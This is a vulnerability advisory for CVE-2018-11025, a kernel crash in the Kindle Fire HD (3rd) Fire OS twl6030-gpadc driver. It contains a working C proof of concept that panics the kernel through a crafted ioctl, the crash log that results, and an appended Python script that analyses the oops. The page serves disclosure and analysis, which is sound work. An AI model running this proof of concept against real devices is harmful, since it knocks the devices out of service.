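(CVE-2018-11025) Amazon Kindle Fire HD (3rd) Fire OS kernel component vulnerability

1. Vulnerability summary

The kernel module /omap/drivers/mfd/twl6030-gpadc.c in the kernel component of Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 allows an attacker to inject a crafted argument through the argument of an ioctl on the device /dev/twl6030-gpadc with command 24832 and cause a kernel crash. To exercise this vulnerability, the device file /dev/twl6030-gpadc must be opened, and the ioctl system call must be invoked on that device file with command 24832 and a crafted payload as the third argument.

2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

PoC

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/twl6030-gpadc causes
 * the system crash via IOCTL 24832.
 *
 * This Poc should run with permission to do ioctl on /dev/twl6030-gpadc.
 *
 */
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <fcntl.h>
#include <errno.h>
#include <unistd.h>   /* close() */
#include <sys/ioctl.h>

static const char *driver = "/dev/twl6030-gpadc";
static int command = 24832;   /* 0x6100, visible as r5 in the crash log */

/* Argument structure passed to the driver as the third ioctl argument. */
struct twl6030_gpadc_user_parms {
    int channel;
    int status;
    unsigned short result;
};

int main(int argc, char **argv, char **env) {
    struct twl6030_gpadc_user_parms payload;

    /* Channel value far outside any valid ADC channel number. */
    payload.channel = 0x9b2a9212;
    payload.status = 0x0;
    payload.result = 0x0;

    int fd = 0;
    fd = open(driver, O_RDWR);
    if (fd < 0) {
        printf("Failed to open %s, with errno %d\n", driver, errno);
        system("echo 1 > /data/local/tmp/log");
        return -1;
    }

    printf("Try ioctl device file '%s', with command 0x%x and payload NULL\n", driver, command);
    printf("System will crash and reboot.\n");
    if (ioctl(fd, command, &payload) < 0) {
        printf("Allocation of structs failed, %d\n", errno);
        system("echo 2 > /data/local/tmp/log");
        return -1;
    }

    close(fd);
    return 0;
}

Crash log

[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc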
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>] lr : [<c031a950>] psr: 60030013
[18460.370452] sp : de94dd90 ip : 00000000 fp : de94df04
[18460.383422] r10: 00000000 r9 : dcccf608 r8 : bea875ec
[18460.389282] r7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea875ec
[18460.396697] r3 : fffffeb4 r2 : 4b3f2730 r1 : de94dee8 r0 : 00000001
[18460.404113] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[18460.412048] Control: 10c5387d Table: 8a21004a DAC: 00000015
Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8)
[18461.146697] Stack: (0xde94dd90 to 0xde94e000)
[18461.335296] Backtrace:
[18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[18461.348571] r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000
[18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[18461.374206] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618
[18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134)
[18461.401061] Board Information:
[18461.401061] Revision : 0001
[18461.401092] Serial : 0000000000000000
[18461.401092] SoC Information:
[18461.401092] CPU : OMAP4470
[18461.401122] Rev : ES1.0
[18461.401122] Type : HS
[18461.401122] Production ID: 0002B975-000000CC
[18461.401122] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[18461.401153]
[18461.406127] audit_printk_skb: 111 callbacks suppressed
[18461.406127] type=1400 audit(1525657115.783:1097): avc: denied { getattr } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406280] type=1400 audit(1525657115.783:1098): avc: denied { execute } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406524] type=1400 audit(1525657115.783:1099): avc: denied { read open } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406768] type=1400 audit(1525657115.783:1100): avc: denied { execute_no_trans } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.534057] ---[ end trace f98f4a7b98572f61 ]---
[18461.540374] Kernel panic - not syncing: Fatal exception
[18461.546173] CPU1: stopping
[18461.549285] Backtrace:
[18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[18461.561828] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_h
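
Added example (not part of the original page or of the driver's code): a triage script that decodes the last two words of the oops "Code:" line and checks that the faulting address is computed from the PoC's channel value, which is what an array index used without a range check looks like in a crash. Function names are illustrative; the log lines and the channel value are taken from this page with whitespace restored.

```python
import re

# Lines taken from this page's crash log, whitespace restored.
OOPS = """\
Unable to handle kernel paging request at virtual address 4b3f25fc
PC is at twl6030_gpadc_ioctl+0x160/0x180
r3 : fffffeb4  r2 : 4b3f2730  r1 : de94dee8  r0 : 00000001
Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134)
"""
CHANNEL = 0x9B2A9212  # payload.channel in the page's PoC
M32 = 0xFFFFFFFF      # 32-bit wrap-around, as on the ARM core

def parse_oops(text):
    """Return (fault address, register dict, Code: words) from an ARM oops."""
    fault = int(re.search(r"virtual address ([0-9a-f]{8})", text).group(1), 16)
    regs = {n: int(v, 16)
            for n, v in re.findall(r"\b(r\d+)\s*:\s*([0-9a-f]{8})", text)}
    words = [int(w, 16)
             for w in re.findall(r"[0-9a-f]{8}", text.split("Code:")[1])]
    return fault, regs, words

def decode_add_lsl(word):
    """Decode A32 'ADD Rd, Rn, Rm, LSL #imm' (S bit clear)."""
    if (word >> 20) & 0xFF != 0x08 or (word >> 4) & 0x7:
        raise ValueError("not ADD Rd, Rn, Rm, LSL #imm")
    return {"rd": (word >> 12) & 0xF, "rn": (word >> 16) & 0xF,
            "rm": word & 0xF, "shift": (word >> 7) & 0x1F}

def decode_ldr_imm(word):
    """Decode A32 LDR/STR with a 12-bit immediate offset (P=1, I=0)."""
    if (word >> 24) & 0xF != 0x5:
        raise ValueError("not an immediate-offset load/store")
    sign = 1 if (word >> 23) & 1 else -1
    return {"load": bool((word >> 20) & 1), "rn": (word >> 16) & 0xF,
            "rd": (word >> 12) & 0xF, "offset": sign * (word & 0xFFF)}

def triage(text=OOPS, index=CHANNEL):
    """Recompute the fault address from a candidate user-supplied index."""
    fault, regs, words = parse_oops(text)
    add, ldr = decode_add_lsl(words[-2]), decode_ldr_imm(words[-1])
    # The load faulted, so its base register still holds the ADD result.
    scaled = (regs[f"r{add['rn']}"] + (index << add["shift"])) & M32
    predicted = (scaled + ldr["offset"]) & M32
    return {"chained": add["rd"] == ldr["rn"],
            "pointer_matches": scaled == regs[f"r{ldr['rn']}"],
            "predicted_fault": predicted,
            "index_controls_fault": predicted == fault}

if __name__ == "__main__":
    print({k: hex(v) if k == "predicted_fault" else v
           for k, v in triage().items()})
```

A match on both the intermediate pointer (r2) and the fault address means the handler scaled the caller's channel field by 4 and dereferenced the result relative to a stack buffer, so the fix to verify in a patched build is a range check on channel before it is used as an index.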